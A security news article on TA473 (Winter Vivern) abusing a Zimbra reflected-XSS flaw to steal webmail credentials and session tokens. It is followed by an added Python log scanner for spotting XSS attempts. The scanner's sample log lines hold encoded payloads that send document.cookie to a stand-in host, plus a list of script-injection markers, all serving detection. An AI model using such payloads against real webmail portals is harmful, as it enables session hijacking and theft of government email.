The dramatic geopolitical situation in Ukraine continues to have implications in Europe, with more and more hostile cyber activity targeting Western infrastructure. A recent report by Proofpoint highlights new attacks aimed at NATO-aligned European countries. Specifically, the researchers describe the activities of a group tracked as TA473, which exploits a Zimbra vulnerability to target the webmail portals of major European governments.
The researchers explain that TA473 is an Advanced Persistent Threat (APT) actor that exploits CVE-2022-27926, a reflected cross-site scripting (XSS) flaw in Zimbra Collaboration, to compromise Zimbra-hosted webmail portals. According to Proofpoint's report, the goal of this activity is to gain access to the emails of military, government and diplomatic organizations in Europe involved in the Russia-Ukraine war.
How the TA473 hacker attacks on NATO countries work
After initial reconnaissance, the attackers send phishing emails that impersonate legitimate government resources. As is often the case with phishing emails, the message contains a malicious URL. Because the flaw is a reflected XSS, the link points at the target organization's own Zimbra webmail portal with the script payload carried in the request, so when a victim clicks it the JavaScript executes in the context of the victim's webmail portal.
These custom, labor-intensive payloads allow the attackers to steal usernames and passwords and to capture active session tokens and CSRF tokens from cookies, giving them access to the publicly facing webmail portals of NATO-aligned organizations.
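As an added example, not code from the original article or from Proofpoint's report: a small Python scanner that walks access-log lines in combined (nginx/Apache) format, decodes each query parameter including double encoding, and flags requests that carry script-like payloads aimed at a webmail portal. The portal path /webmail/search, the IP addresses and every log line are constructed assumptions. The article does not give the exact request that triggers CVE-2022-27926, so the matching is generic reflected-XSS detection rather than a signature for that CVE.

```python
"""Flag reflected-XSS attempts against a webmail portal in web access logs.

Added example for this article; not code from the original page or from
Proofpoint.  Assumptions: combined-format access logs, a hypothetical portal
path /webmail/search, and the constructed sample lines below.  Generic
reflected-XSS detection, not a signature for CVE-2022-27926.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: ip - user [time] "METHOD target HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fragments that indicate script injection once the request is fully decoded.
XSS_MARKERS = (
    "<script", "<svg", "<iframe", "javascript:", "onerror=", "onload=",
    "onfocus=", "srcdoc=", "eval(", "document.cookie",
)

# Constructed sample log lines (not real traffic): a benign search, a
# single-encoded script payload, a double-encoded payload, an event-handler
# payload that exfiltrates document.cookie, and one unparseable line.
SAMPLE_LOG = [
    '203.0.113.10 - - [31/Mar/2023:10:01:02 +0000] "GET /webmail/search?q=meeting+notes HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Mar/2023:10:02:15 +0000] "GET /webmail/search?q=%3Cscript%3Elocation%3D%27https%3A%2F%2Fexample.invalid%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Mar/2023:10:02:40 +0000] "GET /webmail/search?q=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [31/Mar/2023:10:05:01 +0000] "GET /webmail/search?q=%3Cimg%20src%3Dx%20onerror%3Dfetch%28%27https%3A%2F%2Fexample.invalid%2F%3F%27%2Bdocument.cookie%29%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    'garbage line that does not match the log format',
]


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly: double encoding is a common filter-evasion trick."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def xss_markers_in(target):
    """Return the sorted markers found in the decoded path or any query parameter."""
    parts = urlsplit(target)
    candidates = [decode_fully(parts.path)]
    # parse_qsl already decodes one layer; decode_fully strips any further layers.
    candidates += [decode_fully(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    found = {marker for text in candidates for marker in XSS_MARKERS if marker in text.lower()}
    return sorted(found)


def scan(lines):
    """Return (ip, target, markers) for every parseable request carrying a payload."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        markers = xss_markers_in(rec["target"])
        if markers:
            hits.append((rec["ip"], rec["target"], markers))
    return hits


if __name__ == "__main__":
    for ip, target, markers in scan(SAMPLE_LOG):
        print(f"{ip} {markers} {target}")
```

Run against real logs by feeding lines from the Zimbra proxy access log to scan(); the marker list is deliberately short and should be tuned to the portal, and a hit is a lead to investigate (look for the same source IP, referers pointing at the phishing page, and follow-on requests with a valid session), not proof of compromise by itself.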
Proofpoint researchers recently promoted TA473 to a publicly tracked threat actor. Known in open-source research as Winter Vivern, the group has been tracked by Proofpoint since at least 2021.